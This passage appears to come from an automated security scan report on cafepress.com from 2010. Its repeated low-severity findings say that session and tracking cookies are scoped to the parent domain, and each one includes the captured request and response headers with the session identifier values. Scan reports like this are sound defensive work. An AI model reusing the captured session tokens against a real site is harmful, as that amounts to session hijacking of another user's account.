__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 58964
Date: Sun, 26 Dec 2010 13:48:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
Set-Cookie: cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
2.29. http://www.cafepress.com/+posters
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+posters
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+posters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 65598 Date: Sun, 26 Dec 2010 13:47:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/ Set-Cookie: cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65598 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.30. http://www.cafepress.com/+stadium-blanket
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+stadium-blanket
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:45 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+stadium-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59409 Date: Sun, 26 Dec 2010 13:48:46 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:45 GMT; path=/ Set-Cookie: cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:45 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59409 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.31. http://www.cafepress.com/+steins
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+steins
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+steins HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 58661 Date: Sun, 26 Dec 2010 13:47:08 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/ Set-Cookie: cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58661 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.32. http://www.cafepress.com/+stocking
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+stocking
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:38 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+stocking HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 59563 Date: Sun, 26 Dec 2010 13:48:38 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:38 GMT; path=/ Set-Cookie: cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:38 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59563 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.33. http://www.cafepress.com/+sweatshirts-hoodies
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+sweatshirts-hoodies
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:58 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+sweatshirts-hoodies HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 60337 Date: Sun, 26 Dec 2010 13:44:58 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:58 GMT; path=/ Set-Cookie: cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:58 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60337 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.34. http://www.cafepress.com/+thermos
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+thermos
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+thermos HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
